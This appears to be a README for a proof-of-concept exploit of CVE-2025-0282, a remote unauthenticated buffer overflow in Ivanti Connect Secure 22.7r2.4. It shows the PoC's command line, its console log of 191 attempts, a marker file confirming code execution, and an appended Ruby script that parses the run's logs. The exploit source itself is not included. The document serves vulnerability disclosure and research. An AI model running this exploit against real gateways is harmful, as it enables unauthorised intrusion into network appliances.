A remote unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways
This is a proof of concept exploit to demonstrate exploitation of CVE-2025-0282, and is based upon the exploitation strategy published by watchTowr.
This PoC has a ROP chain built to target Ivanti Connect Secure 22.7r2.4. No other version can be targeted without first building the corresponding ROP chain for that target version.
This PoC has a payload that will execute an operating system command to create a temporary file on the target system. This is how you know the exploit has succeeded. Code execution is achieved with the privileges of the non-root user nr.
We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:
C:\Users\sfewer\Desktop\CVE-2025-0282>ruby CVE-2025-0282.rb -t 192.168.86.111 -p 443
[+] Targeting 192.168.86.111:443
[+] Detected version 22.7.2.3597
[2025-01-16 14:39:56 +0000] Starting...
[2025-01-16 14:39:56 +0000] Triggering #1...
[2025-01-16 14:39:57 +0000] Triggering #2...
[2025-01-16 14:40:08 +0000] Triggering #3...
[2025-01-16 14:40:19 +0000] Triggering #4...
[2025-01-16 14:40:30 +0000] Triggering #5...
...snip...
[2025-01-16 15:13:28 +0000] Triggering #188...
[2025-01-16 15:13:38 +0000] Triggering #189...
[2025-01-16 15:13:49 +0000] Triggering #190...
[2025-01-16 15:14:00 +0000] Triggering #191...
If the exploit succeeds, it will write a new file to the temp directory /var/tmp/, with a number value corresponding to the exploit attempt iteration as part of the file name.
In a separate root shell on the target device (which we established by jailbreaking the appliance), we can observe when the exploit has succeeded:
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
ls: cannot access /var/tmp/hax*: No such file or directory
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191
bash-4.2#
We can see from this example that the exploit made 190 failed attempts and was successful on the 191st attempt. So in this example, exploitation of this target succeeded in 34 minutes.
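The following Ruby script is an added example for readers triaging a run like the one above; it is not part of the PoC or of the watchTowr write-up. It parses the timestamped "Triggering #N" lines from the console output and the `ls -al` listing from the target, reports how many attempts were made and how long they took, and checks that the file index in /var/tmp/haxor_N matches the last attempt triggered. The sample output and listing embedded below are constructed from the abbreviated session shown in this README; the function names (summarize_attempts, parse_artifact, artifact_matches?) are this example's own.

```ruby
require 'time'

# Constructed sample of the PoC's console output, abbreviated exactly as the
# README shows it (the "...snip..." gap between #5 and #188 is preserved).
SAMPLE_OUTPUT = <<~LOG
  [+] Targeting 192.168.86.111:443
  [+] Detected version 22.7.2.3597
  [2025-01-16 14:39:56 +0000] Starting...
  [2025-01-16 14:39:56 +0000] Triggering #1...
  [2025-01-16 14:39:57 +0000] Triggering #2...
  [2025-01-16 14:40:08 +0000] Triggering #3...
  [2025-01-16 14:40:19 +0000] Triggering #4...
  [2025-01-16 14:40:30 +0000] Triggering #5...
  ...snip...
  [2025-01-16 15:13:28 +0000] Triggering #188...
  [2025-01-16 15:13:38 +0000] Triggering #189...
  [2025-01-16 15:13:49 +0000] Triggering #190...
  [2025-01-16 15:14:00 +0000] Triggering #191...
LOG

# Constructed sample of the `ls -al /var/tmp/hax*` line seen on the target.
SAMPLE_LISTING = "-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191\n"

# "[2025-01-16 14:39:56 +0000] Triggering #1..."
TRIGGER_RE = /\A\[(?<ts>[^\]]+)\] Triggering #(?<n>\d+)\.\.\./

# "-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191"
# perms links owner group size month day time path
ARTIFACT_RE = %r{\A(?<perms>\S+)\s+\d+\s+(?<owner>\S+)\s+(?<group>\S+)\s+\d+\s+
                 \S+\s+\d+\s+\S+\s+(?<path>/var/tmp/haxor_(?<n>\d+))\s*\z}x

# Summarise the "Triggering #N" lines: how many were seen in this (possibly
# abbreviated) log, the highest attempt index, and wall-clock time between the
# first and last trigger. Returns nil when no trigger lines are present.
def summarize_attempts(output)
  attempts = output.each_line.filter_map do |line|
    m = TRIGGER_RE.match(line.strip)
    m && { n: m[:n].to_i, at: Time.parse(m[:ts]) }
  end
  return nil if attempts.empty?

  {
    triggers_seen: attempts.size,
    last_attempt: attempts.last[:n],
    elapsed_seconds: (attempts.last[:at] - attempts.first[:at]).to_i
  }
end

# Parse one `ls -al` line for the payload's artifact. Returns nil for lines
# that are not a listing of /var/tmp/haxor_N (e.g. the "cannot access" error).
def parse_artifact(listing_line)
  m = ARTIFACT_RE.match(listing_line.strip)
  return nil unless m

  { path: m[:path], owner: m[:owner], group: m[:group], attempt: m[:n].to_i }
end

# The README's observation: the number in the artifact's name is the attempt
# on which the payload ran, so it should equal the last attempt triggered.
def artifact_matches?(summary, artifact)
  return false if summary.nil? || artifact.nil?

  artifact[:attempt] == summary[:last_attempt]
end

if __FILE__ == $PROGRAM_NAME
  s = summarize_attempts(SAMPLE_OUTPUT)
  a = parse_artifact(SAMPLE_LISTING)
  puts "triggers seen: #{s[:triggers_seen]}, last attempt: ##{s[:last_attempt]}, " \
       "elapsed: #{s[:elapsed_seconds]}s (#{s[:elapsed_seconds] / 60} min)"
  puts "artifact #{a[:path]} owned by #{a[:owner]}, attempt #{a[:attempt]}, " \
       "matches last trigger: #{artifact_matches?(s, a)}"
end
```

Run it with `ruby triage.rb` (or feed it real output in place of the constructed samples). For the session in this README it reports 191 as the last attempt and 2044 seconds between the first and last trigger, which is the 34 minutes quoted above; note that `triggers_seen` counts only the lines present in an abbreviated log, so `last_attempt` is the figure to trust for the number of attempts.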